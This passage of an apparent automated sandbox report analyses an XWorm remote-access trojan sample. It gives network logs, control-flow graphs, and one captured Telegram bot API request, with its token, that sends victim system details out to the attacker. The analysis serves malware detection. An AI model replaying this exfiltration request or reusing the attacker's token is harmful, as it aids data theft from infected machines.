                                              Nov 25, 2024 15:39:11.165774107 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.241677046 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.241746902 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.243691921 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.243777037 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:11.269329071 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:11.389291048 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.391614914 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:11.514956951 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:17.201450109 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:17.321664095 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:23.248316050 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:23.372224092 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:32.748306990 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:32.870688915 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:32.870764017 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:32.990773916 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:33.153541088 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:33.153645992 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:37.826186895 CET500101717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:37.829952002 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:37.946310997 CET17175001089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:37.949985981 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:37.950254917 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:37.969410896 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:38.090658903 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:41.248409033 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:41.368678093 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:47.779447079 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:47.899832964 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:48.185710907 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:48.305721045 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:53.482856989 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:53.604926109 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:53.953243971 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:54.085891962 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:59.919374943 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:59.919681072 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:03.515822887 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:03.515822887 CET500111717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:03.636075020 CET17175001189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:03.636094093 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:03.636249065 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:03.655807018 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:03.775949955 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:08.764025927 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:08.884207964 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:08.884291887 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:09.004633904 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:10.233426094 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:10.353462934 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:14.139497042 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:14.259413004 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:15.170139074 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:15.290287018 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:25.585197926 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:25.585268021 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:32.294898033 CET500121717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:32.296061993 CET500131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:32.421237946 CET17175001289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:32.421261072 CET17175001389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:32.421428919 CET500131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:32.443388939 CET500131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:32.563482046 CET17175001389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:40:45.736474037 CET500131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:40:45.856918097 CET17175001389.40.31.232192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2024 15:36:14.194274902 CET5499453192.168.2.41.1.1.1
                                              Nov 25, 2024 15:36:14.344681025 CET53549941.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 25, 2024 15:36:14.194274902 CET192.168.2.41.1.1.10x8f45Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 25, 2024 15:36:14.344681025 CET1.1.1.1192.168.2.40x8f45No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              • api.telegram.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730149.154.167.2204437360C:\Users\user\Desktop\tE3ZXBTP0B.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-25 14:36:16 UTC442OUTGET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A79B301C4E3529A1CAD54%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GP23O5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-11-25 14:36:17 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Mon, 25 Nov 2024 14:36:17 GMT
                                              Content-Type: application/json
                                              Content-Length: 440
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-11-25 14:36:17 UTC440INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 36 33 30 38 39 34 31 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 76 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 76 65 62 6f 74 32 78 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 39 33 30 32 38 37 35 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 61 74 68 75 64 64 6c 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 68 75 64 64 6c 65 6d 61 6e 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 34 35 33 37 37 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57
                                              Data Ascii: {"ok":true,"result":{"message_id":12540,"from":{"id":5630894183,"is_bot":true,"first_name":"steve","username":"stevebot2x2bot"},"chat":{"id":793028759,"first_name":"sathuddle","username":"huddleman01","type":"private"},"date":1732545377,"text":"\u2620 [XW


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:0
                                              Start time:09:36:08
                                              Start date:25/11/2024
                                              Path:C:\Users\user\Desktop\tE3ZXBTP0B.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\tE3ZXBTP0B.exe"
                                              Imagebase:0xd60000
                                              File size:76'800 bytes
                                              MD5 hash:ACF863DD1A3D9BEA3677B677429E6963
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1742331709.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:21.5%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:6
                                                Total number of Limit Nodes:0
                                                execution_graph 5127 7ffd9b8b1c4a 5128 7ffd9b8b28c0 SetWindowsHookExW 5127->5128 5130 7ffd9b8b2971 5128->5130 5119 7ffd9b8b251d 5120 7ffd9b8b254f RtlSetProcessIsCritical 5119->5120 5122 7ffd9b8b2602 5120->5122

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.4193364994.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b8b0000_tE3ZXBTP0B.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6bbf9536d7d5f0a3d6c7be4edc391fd9a285c39ab557a2d8566c3903a73477a2
                                                • Instruction ID: a971de522647947cb6056f092e104a9f5899bd14c7bbbd47baa4e46d79d3bdd2
                                                • Opcode Fuzzy Hash: 6bbf9536d7d5f0a3d6c7be4edc391fd9a285c39ab557a2d8566c3903a73477a2
                                                • Instruction Fuzzy Hash: D8F17B22F2992A4BD759B7BD68395FC77D1EF88364B4000BAD05EC71D7ED28A90287C1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 525 7ffd9b8b8146-7ffd9b8b8153 526 7ffd9b8b8155-7ffd9b8b815d 525->526 527 7ffd9b8b815e-7ffd9b8b8227 525->527 526->527 531 7ffd9b8b8229-7ffd9b8b8232 527->531 532 7ffd9b8b8293 527->532 531->532 533 7ffd9b8b8234-7ffd9b8b8240 531->533 534 7ffd9b8b8295-7ffd9b8b82ba 532->534 535 7ffd9b8b8279-7ffd9b8b8291 533->535 536 7ffd9b8b8242-7ffd9b8b8254 533->536 541 7ffd9b8b8326 534->541 542 7ffd9b8b82bc-7ffd9b8b82c5 534->542 535->534 537 7ffd9b8b8258-7ffd9b8b826b 536->537 538 7ffd9b8b8256 536->538 537->537 540 7ffd9b8b826d-7ffd9b8b8275 537->540 538->537 540->535 543 7ffd9b8b8328-7ffd9b8b83d0 541->543 542->541 544 7ffd9b8b82c7-7ffd9b8b82d3 542->544 555 7ffd9b8b843e 543->555 556 7ffd9b8b83d2-7ffd9b8b83dc 543->556 545 7ffd9b8b82d5-7ffd9b8b82e7 544->545 546 7ffd9b8b830c-7ffd9b8b8324 544->546 548 7ffd9b8b82eb-7ffd9b8b82fe 545->548 549 7ffd9b8b82e9 545->549 546->543 548->548 550 7ffd9b8b8300-7ffd9b8b8308 548->550 549->548 550->546 557 7ffd9b8b8440-7ffd9b8b8469 555->557 556->555 558 7ffd9b8b83de-7ffd9b8b83eb 556->558 565 7ffd9b8b846b-7ffd9b8b8476 557->565 566 7ffd9b8b84d3 557->566 559 7ffd9b8b83ed-7ffd9b8b83ff 558->559 560 7ffd9b8b8424-7ffd9b8b843c 558->560 562 7ffd9b8b8403-7ffd9b8b8416 559->562 563 7ffd9b8b8401 559->563 560->557 562->562 564 7ffd9b8b8418-7ffd9b8b8420 562->564 563->562 564->560 565->566 567 7ffd9b8b8478-7ffd9b8b8486 565->567 568 7ffd9b8b84d5-7ffd9b8b8566 566->568 569 7ffd9b8b8488-7ffd9b8b849a 567->569 570 7ffd9b8b84bf-7ffd9b8b84d1 567->570 576 7ffd9b8b856c-7ffd9b8b857b 568->576 572 7ffd9b8b849c 569->572 573 7ffd9b8b849e-7ffd9b8b84b1 569->573 570->568 572->573 573->573 574 7ffd9b8b84b3-7ffd9b8b84bb 573->574 574->570 577 7ffd9b8b857d 576->577 578 7ffd9b8b8583-7ffd9b8b85e8 call 7ffd9b8b8604 576->578 577->578 585 7ffd9b8b85ea 578->585 586 7ffd9b8b85ef-7ffd9b8b8603 578->586 585->586
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.4193364994.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b8b0000_tE3ZXBTP0B.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3c8cd7e7fd02ddc8128088199ef072ea754c3bed0b450ffd466e2a8ad622e1f
                                                • Instruction ID: a007b2543ca1db28fb7cc37bc52387336c98deb0f374d2aab762213198ab56aa
                                                • Opcode Fuzzy Hash: d3c8cd7e7fd02ddc8128088199ef072ea754c3bed0b450ffd466e2a8ad622e1f
                                                • Instruction Fuzzy Hash: 2FF1A730A09A4E8FEBA8DF28C8557E937D1FF58310F04426EE84DC7695DB34A9458B82

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 587 7ffd9b8b8ef2-7ffd9b8b8eff 588 7ffd9b8b8f0a-7ffd9b8b8fd7 587->588 589 7ffd9b8b8f01-7ffd9b8b8f09 587->589 593 7ffd9b8b8fd9-7ffd9b8b8fe2 588->593 594 7ffd9b8b9043 588->594 589->588 593->594 596 7ffd9b8b8fe4-7ffd9b8b8ff0 593->596 595 7ffd9b8b9045-7ffd9b8b906a 594->595 603 7ffd9b8b90d6 595->603 604 7ffd9b8b906c-7ffd9b8b9075 595->604 597 7ffd9b8b9029-7ffd9b8b9041 596->597 598 7ffd9b8b8ff2-7ffd9b8b9004 596->598 597->595 600 7ffd9b8b9008-7ffd9b8b901b 598->600 601 7ffd9b8b9006 598->601 600->600 602 7ffd9b8b901d-7ffd9b8b9025 600->602 601->600 602->597 606 7ffd9b8b90d8-7ffd9b8b90fd 603->606 604->603 605 7ffd9b8b9077-7ffd9b8b9083 604->605 607 7ffd9b8b9085-7ffd9b8b9097 605->607 608 7ffd9b8b90bc-7ffd9b8b90d4 605->608 612 7ffd9b8b916b 606->612 613 7ffd9b8b90ff-7ffd9b8b9109 606->613 610 7ffd9b8b909b-7ffd9b8b90ae 607->610 611 7ffd9b8b9099 607->611 608->606 610->610 614 7ffd9b8b90b0-7ffd9b8b90b8 610->614 611->610 616 7ffd9b8b916d-7ffd9b8b919b 612->616 613->612 615 7ffd9b8b910b-7ffd9b8b9118 613->615 614->608 617 7ffd9b8b911a-7ffd9b8b912c 615->617 618 7ffd9b8b9151-7ffd9b8b9169 615->618 623 7ffd9b8b920b 616->623 624 7ffd9b8b919d-7ffd9b8b91a8 616->624 619 7ffd9b8b9130-7ffd9b8b9143 617->619 620 7ffd9b8b912e 617->620 618->616 619->619 622 7ffd9b8b9145-7ffd9b8b914d 619->622 620->619 622->618 625 7ffd9b8b920d-7ffd9b8b92e5 623->625 624->623 626 7ffd9b8b91aa-7ffd9b8b91b8 624->626 636 7ffd9b8b92eb-7ffd9b8b92fa 625->636 627 7ffd9b8b91ba-7ffd9b8b91cc 626->627 628 7ffd9b8b91f1-7ffd9b8b9209 626->628 630 7ffd9b8b91d0-7ffd9b8b91e3 627->630 631 7ffd9b8b91ce 627->631 628->625 630->630 632 7ffd9b8b91e5-7ffd9b8b91ed 630->632 631->630 632->628 637 7ffd9b8b92fc 636->637 638 7ffd9b8b9302-7ffd9b8b9364 call 7ffd9b8b9380 636->638 637->638 645 7ffd9b8b9366 638->645 646 7ffd9b8b936b-7ffd9b8b937f 638->646 645->646
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.4193364994.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b8b0000_tE3ZXBTP0B.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edf7709f7a209b8ccc8decf05a325953dd575cb3ea8b592770dded2a75d70eb8
                                                • Instruction ID: 6abe9e9e9a4f7da14f6520d905ca762353d87ac160f90675f4e38395a13aea6d
                                                • Opcode Fuzzy Hash: edf7709f7a209b8ccc8decf05a325953dd575cb3ea8b592770dded2a75d70eb8
                                                • Instruction Fuzzy Hash: 34E1B430A09A4E8FEBA8DF28C8597F977D1FF58310F04426AD84DC72A5DA7899458BC1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 153 7ffd9b8b251d-7ffd9b8b2600 RtlSetProcessIsCritical 157 7ffd9b8b2608-7ffd9b8b263d 153->157 158 7ffd9b8b2602 153->158 158->157
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.4193364994.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b8b0000_tE3ZXBTP0B.jbxd
                                                Similarity
                                                • API ID: CriticalProcess
                                                • String ID:
                                                • API String ID: 2695349919-0
                                                • Opcode ID: d74879924c948030b411da2a60d44f1ec6ad7b9f6ee8cc1588ef60032f882965
                                                • Instruction ID: ae18b06587b6d0726c69dbabaca022a2d72055a717fd7e4d2652f793717fbe4d
                                                • Opcode Fuzzy Hash: d74879924c948030b411da2a60d44f1ec6ad7b9f6ee8cc1588ef60032f882965
                                                • Instruction Fuzzy Hash: 0A41033190C6488FC718DFA8D855AE9BBF0FF56310F04416EE08AC3592CB346846CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 160 7ffd9b8b2898-7ffd9b8b289f 161 7ffd9b8b28aa-7ffd9b8b291d 160->161 162 7ffd9b8b28a1-7ffd9b8b28a9 160->162 166 7ffd9b8b29a9-7ffd9b8b29ad 161->166 167 7ffd9b8b2923-7ffd9b8b2930 161->167 162->161 168 7ffd9b8b2932-7ffd9b8b296f SetWindowsHookExW 166->168 167->168 170 7ffd9b8b2977-7ffd9b8b29a8 168->170 171 7ffd9b8b2971 168->171 171->170
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.4193364994.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b8b0000_tE3ZXBTP0B.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 5d69295863004c5bdb2dbf8bbb6991c5604b77b8061d621427b09bf84b4d0727
                                                • Instruction ID: 0e1237f9c4f4241e7ed08ccbb1f769ca4c93239a613c4d0e37d7ec2642ff955c
                                                • Opcode Fuzzy Hash: 5d69295863004c5bdb2dbf8bbb6991c5604b77b8061d621427b09bf84b4d0727
                                                • Instruction Fuzzy Hash: 5C311930A1CA5D4FDB1CEFAC98566F9BBE1EB59321F00027ED04DC3296CE64A81287C1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 174 7ffd9b8b1c4a-7ffd9b8b291d 178 7ffd9b8b29a9-7ffd9b8b29ad 174->178 179 7ffd9b8b2923-7ffd9b8b2930 174->179 180 7ffd9b8b2932-7ffd9b8b296f SetWindowsHookExW 178->180 179->180 182 7ffd9b8b2977-7ffd9b8b29a8 180->182 183 7ffd9b8b2971 180->183 183->182
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.4193364994.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b8b0000_tE3ZXBTP0B.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: f3fd9ba02320314c6736bc2d84f132aa4a2280e5ecc63ede3618188e90456e69
                                                • Instruction ID: 5e4970675d27aa177173d15e1ea1ec9bceb3055b94a419fbb35b03ac0b224787
                                                • Opcode Fuzzy Hash: f3fd9ba02320314c6736bc2d84f132aa4a2280e5ecc63ede3618188e90456e69
                                                • Instruction Fuzzy Hash: 7C31C930A1CA1D8FDB5CEF9CD8456F977E1EB59311F10423ED04ED3291DA64A8528BC1